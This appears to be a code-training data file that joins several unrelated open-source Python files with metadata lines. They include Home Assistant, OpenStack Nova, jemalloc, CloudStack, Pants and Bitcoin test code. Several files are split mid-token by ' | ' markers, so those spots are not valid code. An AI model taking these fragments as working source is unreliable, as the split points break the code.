"""Return the status of the vacuum."""
if self.supported_features & SUPPORT_BATTERY == 0:
return
return max(0, min(100, self._battery_level))
@property
def device_state_attributes(self):
"""Return device state attributes."""
return {ATTR_CLEANED_AREA: round(self._cleaned_area, 2)}
@property
def supported_features(self):
"""Flag supported features."""
return self._supported_features
def turn_on(self, **kwargs):
"""Turn the vacuum on."""
if self.supported_features & SUPPORT_TURN_ON == 0:
return
self._state = True
self._cleaned_area += 5.32
self._battery_level -= 2
self._status = 'Cleaning'
self.schedule_update_ha_state()
def turn_off(self, **kwargs):
"""Turn the vacuum off."""
if self.supported_features & SUPPORT_TURN_OFF == 0:
return
self._state = False
self._status = 'Charging'
self.schedule_update_ha_state()
def stop(self, **kwargs):
"""Stop the vacuum."""
if self.supported_features & SUPPORT_STOP == 0:
return
self._state = False
self._status = 'Stopping the current task'
self.schedule_update_ha_state()
def clean_spot(self, **kwargs):
"""Perform a spot clean-up."""
if self.supported_features & SUPPORT_CLEAN_SPOT == 0:
return
self._state = True
self._cleaned_area += 1.32
self._battery_level -= 1
self._status = "Cleaning spot"
self.schedule_update_ha_state()
def locate(self, **kwargs):
"""Locate the vacuum (usually by playing a song)."""
if self.supported_features & SUPPORT_LOCATE == 0:
return
self._status = "Hi, I'm over here!"
self.schedule_update_ha_state()
def start_pause(self, **kwargs):
"""Start, pause or resume the cleaning task."""
if self.supported_features & SUPPORT_PAUSE == 0:
return
self._state = not self._state
if self._state:
self._status = 'Resuming the current task'
self._cleaned_area += 1.32
self._battery_level -= 1
else:
self._status = 'Pausing the current task'
self.schedule_update_ha_state()
def set_fan_speed(self, fan_speed, **kwargs):
"""Set the vacuum's fan speed."""
if self.supported_features & SUPPORT_FAN_SPEED == 0:
return
if fan_speed in self.fan_speed_list:
self._fan_speed = fan_speed
self.schedule_update_ha_state()
def return_to_base(self, **kwargs):
"""Tell the vacuum to return to its dock."""
if self.supported_features & SUPPORT_RETURN_HOME == 0:
return
self._state = False
self._status = 'Returning home...'
self._battery_level += 5
self.schedule_update_ha_state()
def send_command(self, command, params=None, **kwargs):
"""Send a command to the vacuum."""
if self.supported_features & SUPPORT_SEND_COMMAND == 0:
return
self._status = 'Executing {}({})'.format(command, params)
self._state = True
self.schedule_update_ha_state()
class StateDemoVacuum(StateVacuumDevice):
"""Representation of a demo vacuum supporting states."""
def __init__(self, name):
"""Initialize the vacuum."""
self._name = name
self._supported_features = SUPPORT_STATE_SERVICES
self._state = STATE_DOCKED
self._fan_speed = FAN_SPEEDS[1]
self._cleaned_area = 0
self._battery_level = 100
@property
def name(self):
"""Return the name of the vacuum."""
return self._name
@property
def should_poll(self):
"""No polling needed for a demo vacuum."""
return False
@property
def supported_features(self):
"""Flag supported features."""
return self._supported_features
@property
def state(self):
"""Return the current state of the vacuum."""
return self._state
@property
def battery_level(self):
"""Return the current battery level of the vacuum."""
if self.supported_features & SUPPORT_BATTERY == 0:
return
return max(0, min(100, self._battery_level))
@property
def fan_speed(self):
"""Return the current fan speed of the vacuum."""
if self.supported_features & SUPPORT_FAN_SPE |
rahulunair/nova | nova/tests/functional/api_sample_tests/test_shelve.py | Python | apache-2.0 | 2,812 | 0 | # Copyright 2012 Nebula, Inc.
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import nova.conf
from nova.tests.functional.api_sample_tests import test_servers
CONF = nova.conf.CONF
class ShelveJsonTest(test_servers.ServersSampleBase):
sample_dir = "os-shelve"
def setUp(self):
super(ShelveJsonTest, self).setUp()
# Don't offload instance, so we can test the offload call.
CONF.set_override('shelved_offload_time', -1)
def _te | st_server_action(self, uuid, template, action):
response = self._do_post('servers/%s/action' % uuid,
template, {'a | ction': action})
self.assertEqual(202, response.status_code)
self.assertEqual("", response.text)
def test_shelve(self):
uuid = self._post_server()
self._test_server_action(uuid, 'os-shelve', 'shelve')
def test_shelve_offload(self):
uuid = self._post_server()
self._test_server_action(uuid, 'os-shelve', 'shelve')
self._test_server_action(uuid, 'os-shelve-offload', 'shelveOffload')
def test_unshelve(self):
uuid = self._post_server()
self._test_server_action(uuid, 'os-shelve', 'shelve')
self._test_server_action(uuid, 'os-unshelve', 'unshelve')
class UnshelveJson277Test(test_servers.ServersSampleBase):
sample_dir = "os-shelve"
microversion = '2.77'
scenarios = [('v2_77', {'api_major_version': 'v2.1'})]
def _test_server_action(self, uuid, template, action, subs=None):
subs = subs or {}
subs.update({'action': action})
response = self._do_post('servers/%s/action' % uuid,
template, subs)
self.assertEqual(202, response.status_code)
self.assertEqual("", response.text)
def test_unshelve_with_az(self):
uuid = self._post_server()
self._test_server_action(uuid, 'os-shelve', 'shelve')
self._test_server_action(uuid, 'os-unshelve', 'unshelve',
subs={"availability_zone": "us-west"})
def test_unshelve_no_az(self):
uuid = self._post_server()
self._test_server_action(uuid, 'os-shelve', 'shelve')
self._test_server_action(uuid, 'os-unshelve-null', 'unshelve')
|
arangodb/arangodb | 3rdParty/jemalloc/v5.2.1/scripts/gen_travis.py | Python | apache-2.0 | 8,683 | 0.001497 | #!/usr/bin/env python3
from itertools import combinations, chain
from enum import Enum, auto
LINUX = 'linux'
OSX = 'osx'
WINDOWS = 'windows'
AMD64 = 'amd64'
ARM64 = 'arm64'
PPC64LE = 'ppc64le'
TRAVIS_TEMPLATE = """\
# This config file is generated by ./scripts/gen_travis.py.
# Do not edit by hand.
# We use 'minimal', because 'generic' makes Windows VMs hang at startup. Also
# the software provided by 'generic' is simply not needed for our tests.
# Differences are explained here:
# https://docs.travis-ci.com/user/languages/minimal-and-generic/
language: minimal
dist: focal
jobs:
include:
{jobs}
before_install:
- |-
if test -f "./scripts/$TRAVIS_OS_NAME/before_install.sh"; then
source ./scripts/$TRAVIS_OS_NAME/before_install.sh
fi
before_script:
- |-
if test -f "./scripts/$TRAVIS_OS_NAME/before_script.sh"; then
source ./scripts/$TRAVIS_OS_NAME/before_script.sh
else
scripts/gen_travis.py > travis_script && diff .travis.yml travis_script
autoconf
# If COMPILER_FLAGS are not empty, add them to CC and CXX
./configure ${{COMPILER_FLAGS:+ CC="$CC $COMPILER_FLAGS" \
CXX="$CXX $COMPILER_FLAGS"}} $CONFIGURE_FLAGS
make -j3
make -j3 tests
fi
script:
- |-
if test -f "./scripts/$TRAVIS_OS_NAME/script.sh"; then
source ./scripts/$TRAVIS_OS_NAME/script.sh
else
make check
fi
"""
class Option(object):
class Type:
COMPILER = auto()
COMPILER_FLAG = auto()
CONFIGURE_FLAG = auto()
MALLOC_CONF = auto()
FEATURE = auto()
def __init__(self, type, value):
self.type = type
self.value = value
@staticmethod
def as_compiler(value):
return Option(Option.Type.COMPILER, value)
@staticmethod
def as_compiler_flag(value):
return Option(Option.Type.COMPILER_FLAG, value)
@staticmethod
def as_configure_flag(value):
return Option(Option.Type.CONFIGURE_FLAG, value)
@staticmethod
def as_malloc_conf(value):
return Option(Option.Type.MALLOC_CONF, value)
@staticmethod
def as_feature(value):
return Option(Option.Type.FEATURE, value)
def __eq__(self, obj):
return (isinstance(obj, Option) and obj.type == self.type
and obj.value == self.value)
# The 'default' configuration is gcc, on linux, with no compiler or configure
# flags. We also test with clang, -m32, --enable-debug, --enable-prof,
# --disable-stats, and --with-malloc-conf=tcache:false. To avoid abusing
# travis though, we don't test all 2**7 = 128 possible combinations of these;
# instead, we only test combinations of up to 2 'unusual' settings, under the
# hope that bugs involving interactions of such settings are rare.
MAX_UNUSUAL_OPTIONS = 2
GCC = Option.as_compiler('CC=gcc CXX=g++')
CLANG = Option.as_compiler('CC=clang CXX=clang++')
CL = Option.as_compiler('CC=cl.exe CXX=cl.exe')
compilers_unusual = [CLANG,]
CROSS_COMPILE_32BIT = Option.as_feature('CROSS_COMPILE_32BIT')
feature_unusuals = [CROSS_COMPILE_32BIT]
configure_flag_unusuals = [Option.as_configure_flag(opt) for opt in (
'--enable-debug',
'--enable-prof',
'--disable-stats',
'--disable-libdl',
'--enable-opt-safety-checks',
'--with-lg-page=16',
)]
malloc_conf_unusuals = [Option.as_malloc_conf(opt) for opt in (
'tcache:false',
'dss:primary',
'percpu_arena:percpu',
'background_thread:true',
)]
all_unusuals = (compilers_unusual + feature_unusuals
+ configure_flag_unusuals + malloc_conf_unusuals)
def get_extra_cflags(os, compiler):
if os == WINDOWS:
# For non-CL compilers under Windows (for now it's only MinGW-GCC),
# -fcommon needs to be specified to correctly handle multiple
# 'malloc_conf' symbols and such, which are declared weak under Linux.
# Weak symbols don't work with MinGW-GCC.
if compiler != CL.value:
return ['-fcommon']
else:
return []
# We get some spurious errors when -Warray-bounds is enabled.
extra_cflags = ['-Werror', '-Wno-array-bounds']
if compiler == CLANG.value or os == OSX:
extra_cflags += [
'-Wno-unknown-warning-op | tion',
'-Wno-ignored-attributes'
]
if os == OSX:
extra_cflags += [
'-Wno-deprecated-declarations',
]
return extra_cflags
# Formats a job from a combination of flags
def format_job(os, arch, combination):
compilers = [x.value for x in combination if x.type == Option.Type.COMPILER]
assert(len(compilers) <= 1)
compiler_flags = | [x.value for x in combination if x.type == Option.Type.COMPILER_FLAG]
configure_flags = [x.value for x in combination if x.type == Option.Type.CONFIGURE_FLAG]
malloc_conf = [x.value for x in combination if x.type == Option.Type.MALLOC_CONF]
features = [x.value for x in combination if x.type == Option.Type.FEATURE]
if len(malloc_conf) > 0:
configure_flags.append('--with-malloc-conf=' + ','.join(malloc_conf))
if not compilers:
compiler = GCC.value
else:
compiler = compilers[0]
extra_environment_vars = ''
cross_compile = CROSS_COMPILE_32BIT.value in features
if os == LINUX and cross_compile:
compiler_flags.append('-m32')
features_str = ' '.join([' {}=yes'.format(feature) for feature in features])
stringify = lambda arr, name: ' {}="{}"'.format(name, ' '.join(arr)) if arr else ''
env_string = '{}{}{}{}{}{}'.format(
compiler,
features_str,
stringify(compiler_flags, 'COMPILER_FLAGS'),
stringify(configure_flags, 'CONFIGURE_FLAGS'),
stringify(get_extra_cflags(os, compiler), 'EXTRA_CFLAGS'),
extra_environment_vars)
job = ' - os: {}\n'.format(os)
job += ' arch: {}\n'.format(arch)
job += ' env: {}'.format(env_string)
return job
def generate_unusual_combinations(unusuals, max_unusual_opts):
"""
Generates different combinations of non-standard compilers, compiler flags,
configure flags and malloc_conf settings.
@param max_unusual_opts: Limit of unusual options per combination.
"""
return chain.from_iterable(
[combinations(unusuals, i) for i in range(max_unusual_opts + 1)])
def included(combination, exclude):
"""
Checks if the combination of options should be included in the Travis
testing matrix.
@param exclude: A list of options to be avoided.
"""
return not any(excluded in combination for excluded in exclude)
def generate_jobs(os, arch, exclude, max_unusual_opts, unusuals=all_unusuals):
jobs = []
for combination in generate_unusual_combinations(unusuals, max_unusual_opts):
if included(combination, exclude):
jobs.append(format_job(os, arch, combination))
return '\n'.join(jobs)
def generate_linux(arch):
os = LINUX
# Only generate 2 unusual options for AMD64 to reduce matrix size
max_unusual_opts = MAX_UNUSUAL_OPTIONS if arch == AMD64 else 1
exclude = []
if arch == PPC64LE:
# Avoid 32 bit builds and clang on PowerPC
exclude = (CROSS_COMPILE_32BIT, CLANG,)
return generate_jobs(os, arch, exclude, max_unusual_opts)
def generate_macos(arch):
os = OSX
max_unusual_opts = 1
exclude = ([Option.as_malloc_conf(opt) for opt in (
'dss:primary',
'percpu_arena:percpu',
'background_thread:true')] +
[Option.as_configure_flag('--enable-prof')] +
[CLANG,])
return generate_jobs(os, arch, exclude, max_unusual_opts)
def generate_windows(arch):
os = WINDOWS
max_unusual_opts = 3
unusuals = (
Option.as_configure_flag('--enable-debug'),
CL,
CROSS_COMPILE_32BIT,
)
return generate_jobs(os, arch, (), max_unusual_opts, unusuals)
def get_manual_jobs():
return """\
# Development build
- os: linux
env: CC=gcc CXX=g++ CONFIGURE_FLAGS="--enable-debug \
--disable-cache-oblivious --enable-stats --enable-log --enable-prof" \
EXTRA_CFLAGS="-Werror -Wno-array-bounds"
# |
piskvorky/pattern | pattern/__init__.py | Python | bsd-3-clause | 2,453 | 0.004892 | #### PATTERN ########################################################################## | #############
# Author: Tom De Smedt <tom@organisms.be>
# License: BSD License, see LICENSE.txt
# | Copyright (c) 2010 University of Antwerp, Belgium
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Pattern nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# CLiPS Computational Linguistics Group, University of Antwerp, Belgium
# http://www.clips.ua.ac.be/pages/pattern
### CREDITS ########################################################################################
__author__ = "Tom De Smedt"
__version__ = "2.3"
__copyright__ = "Copyright (c) 2010 University of Antwerp (BE)"
__license__ = "BSD"
####################################################################################################
import os
try:
# prevent en.parser from shadowing the stdlib module parser
import compiler, parser
except ImportError:
pass
__path__.append(os.path.join(__path__[0], "text"))
|
mikn/autobot | setup.py | Python | mit | 648 | 0 | from setuptools import setup, find_packages
with open('requirements.txt') as reqs:
inst_reqs = reqs.read().split('\n')
setup(
name='autobot',
version='0.1.0',
packages=find_packages(),
author='M | ikael Knutsson',
author_email='mikael.knutsson@gmail.com',
description='A bot framework made according to actual software principles',
long_descript | ion=open('README.md').read(),
classifiers=['License :: OSI Approved :: BSD License'],
install_requires=inst_reqs,
entry_points={
'console_scripts': ['autobot = autobot.main:main',
'autobot_init = autobot.init:main']
}
)
|
resmo/cloudstack | test/integration/plugins/nuagevsp/test_nuage_vpc_internal_lb.py | Python | apache-2.0 | 123,514 | 0 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
" | "" Component tests for VPC Internal Load Balancer functionality with
Nuage VSP SDN plugin
"""
# Import Local Modules
from nuageTestCase import nuageTestCase
from marvin.lib.base import (Account,
ApplicationLoadBalancer,
Network,
Router)
from marvin.cloudstackAPI import (listInternalLoadBalancerVMs,
stopInternalLoadBalancerVM,
startInternalLoadBalancerVM) |
# Import System Modules
from nose.plugins.attrib import attr
import copy
import time
class TestNuageInternalLb(nuageTestCase):
"""Test VPC Internal LB functionality with Nuage VSP SDN plugin
"""
@classmethod
def setUpClass(cls):
super(TestNuageInternalLb, cls).setUpClass()
return
def setUp(self):
# Create an account
self.account = Account.create(self.api_client,
self.test_data["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup = [self.account]
return
# create_Internal_LB_Rule - Creates Internal LB rule in the given
# VPC network
def create_Internal_LB_Rule(self, network, vm_array=None, services=None,
source_ip=None):
self.debug("Creating Internal LB rule in VPC network with ID - %s" %
network.id)
if not services:
services = self.test_data["internal_lbrule"]
int_lb_rule = ApplicationLoadBalancer.create(
self.api_client,
services=services,
sourcenetworkid=network.id,
networkid=network.id,
sourceipaddress=source_ip
)
self.debug("Created Internal LB rule")
# Assigning VMs to the created Internal Load Balancer rule
if vm_array:
self.debug("Assigning virtual machines - %s to the created "
"Internal LB rule" % vm_array)
int_lb_rule.assign(self.api_client, vms=vm_array)
self.debug("Assigned VMs to the created Internal LB rule")
return int_lb_rule
# validate_Internal_LB_Rule - Validates the given Internal LB rule,
# matches the given Internal LB rule name and state against the list of
# Internal LB rules fetched
def validate_Internal_LB_Rule(self, int_lb_rule, state=None,
vm_array=None):
"""Validates the Internal LB Rule"""
self.debug("Check if the Internal LB Rule is created successfully ?")
int_lb_rules = ApplicationLoadBalancer.list(self.api_client,
id=int_lb_rule.id
)
self.assertEqual(isinstance(int_lb_rules, list), True,
"List Internal LB Rule should return a valid list"
)
self.assertEqual(int_lb_rule.name, int_lb_rules[0].name,
"Name of the Internal LB Rule should match with the "
"returned list data"
)
if state:
self.assertEqual(int_lb_rules[0].loadbalancerrule[0].state, state,
"Internal LB Rule state should be '%s'" % state
)
if vm_array:
instance_ids = [instance.id for instance in
int_lb_rules[0].loadbalancerinstance]
for vm in vm_array:
self.assertEqual(vm.id in instance_ids, True,
"Internal LB instance list should have the "
"VM with ID - %s" % vm.id
)
self.debug("Internal LB Rule creation successfully validated for %s" %
int_lb_rule.name)
# list_InternalLbVms - Lists deployed Internal LB VM instances
def list_InternalLbVms(self, network_id=None, source_ip=None):
listInternalLoadBalancerVMsCmd = \
listInternalLoadBalancerVMs.listInternalLoadBalancerVMsCmd()
listInternalLoadBalancerVMsCmd.account = self.account.name
listInternalLoadBalancerVMsCmd.domainid = self.account.domainid
if network_id:
listInternalLoadBalancerVMsCmd.networkid = network_id
internal_lb_vms = self.api_client.listInternalLoadBalancerVMs(
listInternalLoadBalancerVMsCmd)
if source_ip:
return [internal_lb_vm for internal_lb_vm in internal_lb_vms
if str(internal_lb_vm.guestipaddress) == source_ip]
else:
return internal_lb_vms
# get_InternalLbVm - Returns Internal LB VM instance for the given VPC
# network and source ip
def get_InternalLbVm(self, network, source_ip):
self.debug("Finding the InternalLbVm for network with ID - %s and "
"source IP address - %s" % (network.id, source_ip))
internal_lb_vms = self.list_InternalLbVms(network.id, source_ip)
self.assertEqual(isinstance(internal_lb_vms, list), True,
"List InternalLbVms should return a valid list"
)
return internal_lb_vms[0]
# stop_InternalLbVm - Stops the given Internal LB VM instance
def stop_InternalLbVm(self, int_lb_vm, force=False):
self.debug("Stopping InternalLbVm with ID - %s" % int_lb_vm.id)
cmd = stopInternalLoadBalancerVM.stopInternalLoadBalancerVMCmd()
cmd.id = int_lb_vm.id
if force:
cmd.forced = force
self.api_client.stopInternalLoadBalancerVM(cmd)
# start_InternalLbVm - Starts the given Internal LB VM instance
def start_InternalLbVm(self, int_lb_vm):
self.debug("Starting InternalLbVm with ID - %s" % int_lb_vm.id)
cmd = startInternalLoadBalancerVM.startInternalLoadBalancerVMCmd()
cmd.id = int_lb_vm.id
self.api_client.startInternalLoadBalancerVM(cmd)
# check_InternalLbVm_state - Checks if the Internal LB VM instance of the
# given VPC network and source IP is in the expected state form the list of
# fetched Internal LB VM instances
def check_InternalLbVm_state(self, network, source_ip, state=None):
self.debug("Check if the InternalLbVm is in state - %s" % state)
internal_lb_vms = self.list_InternalLbVms(network.id, source_ip)
self.assertEqual(isinstance(internal_lb_vms, list), True,
"List InternalLbVm should return a valid list"
)
if state:
self.assertEqual(internal_lb_vms[0].state, state,
"InternalLbVm is not in the expected state"
)
self.debug("InternalLbVm instance - %s is in the expected state - %s" %
(internal_lb_vms[0].name, state))
# verify_vpc_vm_ingress_traffic - Verifies ingress traffic to the given VM
# (SSH into VM) via a created Static NAT rule in the given VPC network
def verify_vpc_vm_ingress_traffic(self, vm, network, vpc):
self.debug("Verifying ingress traffic to the VM (SSH into VM) - %s "
"via a created Static NAT rule in the VPC network - |
rkojedzinszky/thermo-center | heatcontrol/migrations/0016_heatcontrol_profile_end_null.py | Python | bsd-3-clause | 473 | 0 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.12 on 2018-12-27 09:40
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('heatcontrol', '0015_heatcontrol_prof | ile_add_holes'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='end',
field=models.TimeField(blank=True, nul | l=True),
),
]
|
benjyw/pants | src/python/pants/testutil/pants_integration_test.py | Python | apache-2.0 | 11,626 | 0.002752 | # Copyright 2019 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import glob
import os
import subprocess
import sys
from contextlib import contextmanager
from dataclasses import dataclass
from typing import Any, Iterator, List, Mapping, Optional, Union
import pytest
from pants.base.build_environment import get_buildroot
from pants.base.exiter import PANTS_SUCCEEDED_EXIT_CODE
from pants.option.config import TomlSerializer
from pants.option.options_bootstrapper import OptionsBootstrapper
from pants.pantsd.pants_daemon_client import PantsDaemonClient
from pants.testutil._process_handler import SubprocessProcessHandler
from pants.util.contextutil import temporary_dir
from pants.util.dirutil import fast_relpath, safe_file_dump, safe_mkdir, safe_open
from pants.util.osutil import Pid
from pants.util.strutil import ensure_binary
# NB: If `shell=True`, it's a single `str`.
Command = Union[str, List[str]]
@dataclass(frozen=True)
class PantsResult:
command: Command
exit_code: int
stdout: str
stderr: str
workdir: str
pid: Pid
def _format_unexpected_error_code_msg(self, msg: Optional[str]) -> str:
details = [msg] if msg else []
details.append(" ".join(self.command))
details.append(f"exit_code: {self.exit_code}")
def indent(content):
return "\n\t".join(content.splitlines())
details.append(f"stdout:\n\t{indent(self.stdout)}")
details.append(f"stderr:\n\t{indent(self.stderr)}")
return "\n".join(details)
def assert_success(self, msg: Optional[str] = None) -> None:
assert self.exit_code == 0, self._format_unexpected_error_code_msg(msg)
def assert_failure(self, msg: Optional[str] = None) -> None:
assert self.exit_code != 0, self._format_unexpected_error_code_msg(msg)
@dataclass(frozen=True)
class PantsJoinHandle:
command: Command
process: subprocess.Popen
workdir: str
def join(self, stdin_data: bytes | str | None = None, tee_output: bool = False) -> PantsResult:
"""Wait for the pants process to complete, and return a PantsResult for it."""
communicate_fn = self.process.communicate
if tee_output:
# TODO: MyPy complains that SubprocessProcessHandler.communicate_teeing_stdout_and_stderr does
# not have the same type signature as subprocess.Popen.communicate_teeing_stdout_and_stderr.
# It's possibly not worth trying to fix this because the type stubs for subprocess.Popen are
# very complex and also not very precise, given how many different configurations Popen can
# take.
communicate_fn = SubprocessProcessHandler(self.process).communicate_teeing_stdout_and_stderr # type: ignore[assignment]
if stdin_data is not None:
stdin_data = ensure_binary(stdin_data)
(stdout, stderr) = communicate_fn(stdin_data)
if self.process.returncode != PANTS_SUCCEEDED_EXIT_CODE:
render_logs(se | lf.workdir)
return PantsResult(
command=self.command,
exit_code=self.process.returncode,
stdout=stdout.decode(),
stderr=stderr.decode(),
workdir=self.workdir,
pid=self.process.pid,
)
def run_pants_with_workdir_without_waiting(
command: Command,
*,
workdir: str,
he | rmetic: bool = True,
use_pantsd: bool = True,
config: Mapping | None = None,
extra_env: Mapping[str, str] | None = None,
print_stacktrace: bool = True,
**kwargs: Any,
) -> PantsJoinHandle:
args = [
"--no-pantsrc",
f"--pants-workdir={workdir}",
f"--print-stacktrace={print_stacktrace}",
]
pantsd_in_command = "--no-pantsd" in command or "--pantsd" in command
pantsd_in_config = config and "GLOBAL" in config and "pantsd" in config["GLOBAL"]
if not pantsd_in_command and not pantsd_in_config:
args.append("--pantsd" if use_pantsd else "--no-pantsd")
if hermetic:
args.append("--pants-config-files=[]")
if config:
toml_file_name = os.path.join(workdir, "pants.toml")
with safe_open(toml_file_name, mode="w") as fp:
fp.write(TomlSerializer(config).serialize())
args.append(f"--pants-config-files={toml_file_name}")
pants_script = [sys.executable, "-m", "pants"]
# Permit usage of shell=True and string-based commands to allow e.g. `./pants | head`.
pants_command: Command
if kwargs.get("shell") is True:
assert not isinstance(command, list), "must pass command as a string when using shell=True"
pants_command = " ".join([*pants_script, " ".join(args), command])
else:
pants_command = [*pants_script, *args, *command]
# Only allow-listed entries will be included in the environment if hermetic=True. Note that
# the env will already be fairly hermetic thanks to the v2 engine; this provides an
# additional layer of hermiticity.
if hermetic:
# With an empty environment, we would generally get the true underlying system default
# encoding, which is unlikely to be what we want (it's generally ASCII, still). So we
# explicitly set an encoding here.
env = {"LC_ALL": "en_US.UTF-8"}
# Apply our allowlist.
for h in (
"HOME",
"PATH", # Needed to find Python interpreters and other binaries.
"PANTS_PROFILE",
"RUN_PANTS_FROM_PEX",
):
value = os.getenv(h)
if value is not None:
env[h] = value
hermetic_env = os.getenv("HERMETIC_ENV")
if hermetic_env:
for h in hermetic_env.strip(",").split(","):
value = os.getenv(h)
if value is not None:
env[h] = value
else:
env = os.environ.copy()
if extra_env:
env.update(extra_env)
env.update(PYTHONPATH=os.pathsep.join(sys.path))
# Pants command that was called from the test shouldn't have a parent.
if "PANTS_PARENT_BUILD_ID" in env:
del env["PANTS_PARENT_BUILD_ID"]
return PantsJoinHandle(
command=pants_command,
process=subprocess.Popen(
pants_command,
env=env,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
**kwargs,
),
workdir=workdir,
)
def run_pants_with_workdir(
command: Command,
*,
workdir: str,
hermetic: bool = True,
use_pantsd: bool = True,
config: Mapping | None = None,
stdin_data: bytes | str | None = None,
tee_output: bool = False,
**kwargs: Any,
) -> PantsResult:
if config:
kwargs["config"] = config
handle = run_pants_with_workdir_without_waiting(
command, workdir=workdir, hermetic=hermetic, use_pantsd=use_pantsd, **kwargs
)
return handle.join(stdin_data=stdin_data, tee_output=tee_output)
def run_pants(
command: Command,
*,
hermetic: bool = True,
use_pantsd: bool = True,
config: Mapping | None = None,
extra_env: Mapping[str, str] | None = None,
stdin_data: bytes | str | None = None,
**kwargs: Any,
) -> PantsResult:
"""Runs Pants in a subprocess.
:param command: A list of command line arguments coming after `./pants`.
:param hermetic: If hermetic, your actual `pants.toml` will not be used.
:param use_pantsd: If True, the Pants process will use pantsd.
:param config: Optional data for a generated TOML file. A map of <section-name> ->
map of key -> value.
:param extra_env: Set these env vars in the Pants process's environment.
:param stdin_data: Make this data available to be read from the process's stdin.
:param kwargs: Extra keyword args to pass to `subprocess.Popen`.
"""
with temporary_workdir() as workdir:
return run_pants_with_workdir(
command,
workdir=workdir,
hermetic=hermetic,
use_pantsd=use_pantsd,
config=config,
|
guncoin/guncoin | test/functional/feature_nulldummy.py | Python | mit | 6,442 | 0.00652 | #!/usr/bin/env python3
# Copyright (c) 2016-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test NULLDUMMY softfork.
Connect to a single node.
Generate 2 blocks (save the coinbases for later).
Generate 427 more blocks.
[Policy/Consensus] Check that NULLDUMMY compliant transactions are accepted in the 430th block.
[Policy] Check that non-NULLDUMMY transactions are rejected before activation.
[Consensus] Check that the new NULLDUMMY rules are not enforced on the 431st block.
[Policy/Consensus] Check that the new NULLDUMMY rules are enforced on the 432nd block.
"""
from test_framework.blocktools import create_coinbase, create_block, create_transaction, add_witness_commitment
from test_framework.messages import CTransaction
from test_framework.script import CScript
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error, bytes_to_hex_str
import time
NULLDUMMY_ERROR = "non-mandatory-script-verify-flag (Dummy CHECKMULTISIG argument must be zero) (code 64)"
def trueDummy(tx):
scriptSig = CScript(tx.vin[0].scriptSig)
newscript = []
for i in scriptSig:
if (len(newscript) == 0):
assert(len(i) == 0)
newscript.append(b'\x51')
else:
newscript.append(i)
tx.vin[0].scriptSig = CScript(newscript)
tx.rehash()
class NULLDUMMYTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
# This script tests NULLDUMMY activation, which is part of the 'segwit' deployment, so we go through
# normal segwit activation here (and don't use the default always-on behaviour).
self.extra_args = [['-whitelist=127.0.0.1', '-vbparams=segwit:0:999999999999', '-addresstype=legacy', "-deprecatedrpc=addwitnessaddress"]]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
self.address = self.nodes[0].getnewaddress()
self.ms_address = self.nodes[0].addmultisigaddress(1, [self.address])['address']
self.wit_address = self.nodes[0].addwitnessaddress(self.address)
self.wit_ms_address = self.nodes[0].addmultisigaddress(1, [self.address], '', 'p2sh-segwit')['address']
self.coinbase_blocks = self.nodes[0].generate(2) # Block 2
coinbase_txid = []
for i in self.coinbase_blocks:
coinbase_txid.append(self.nodes[0].getblock(i)['tx'][0])
self.nodes[0].generate(427) # Block 429
self.lastblockhash = self.nodes[0].getbestblockhash()
self.tip = int("0x" + self.lastblockhash, 0)
self.lastblockheight = 429
self.lastblocktime = int(time.time()) + 429
self.log.info("Test 1: NULLDUMMY compliant base transactions should be accepted to mempool and mined before activation [430]")
test1txs = [create_transaction(self.nodes[0], coinbase_txid[0], self.ms_address, amount=49)]
